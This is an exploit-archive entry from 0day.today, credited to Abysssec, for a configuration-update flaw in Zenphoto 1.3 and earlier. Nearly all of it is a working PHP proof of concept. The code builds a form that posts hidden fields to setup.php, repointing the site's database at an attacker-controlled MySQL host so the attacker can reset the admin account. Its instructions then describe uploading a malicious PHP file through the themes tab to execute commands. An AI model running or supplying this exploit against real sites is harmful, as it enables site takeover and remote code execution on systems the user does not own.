Zenphoto Config Update and Command Execute Vulnerability

2010-09-27T00:00:00
ID 1337DAY-ID-14207
Type zdt
Reporter Abysssec
Modified 2010-09-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================================
Zenphoto Config Update and Command Execute Vulnerability
========================================================

 Title            :  Zenphoto Config Update and Command Execute Vulnerability
  Affected Version :  Zenphoto <= 1.3
  Discovery        :  www.abysssec.com
  Vendor           :  http://www.zenphoto.org
  
*/
 
 
$path = "http://www.site.com/zenphoto" ."/" . "zp-core/setup.php";
$new_mysql_user = "abysssec";
$new_mysql_pass = "absssec";
$new_mysql_host = "abysssec.com";
$new_mysql_database = "abysssec_database";
$new_mysql_prefix = "zp_";
echo "<html><head></head>
<style>
body {font-family:tahoma;font-size:14px}
</style>
 
<body>";
echo "Zen Photo Image Gallery 1.3 Reset admin Password <br>
    By : Abysssec @ Inc <br>www.Abysssec.com<hr>
    <form method='POST' action='$path' >
    <input type=hidden name='mysql' value='yes'>
    <input type=hidden name='mysql_user' value='$new_mysql_user'>
    <input type=hidden name='mysql_pass' value='$new_mysql_pass'>
    <input type=hidden name='mysql_host' value='$new_mysql_host'>
    <input type=hidden name='mysql_database' value='$new_mysql_database'>
    <input type=hidden name='mysql_prefix' value='$new_mysql_prefix'>
    After click on below , if target will can connect to your Mysql_Host :<br>
    You Must view 'GO !' Messege ...<br>
    Click on & wait ....
    <br> Then , You need to set your admin user and password.<br><hr>
    Upload file:<br>
    you can Edit themes From themes Tab and Upload your malignant PHP file.<br>
    <input type=submit value='Send Your Setting '>
    </form>
    ";
echo "</body></html>";
?>



#  0day.today [2018-03-09]  #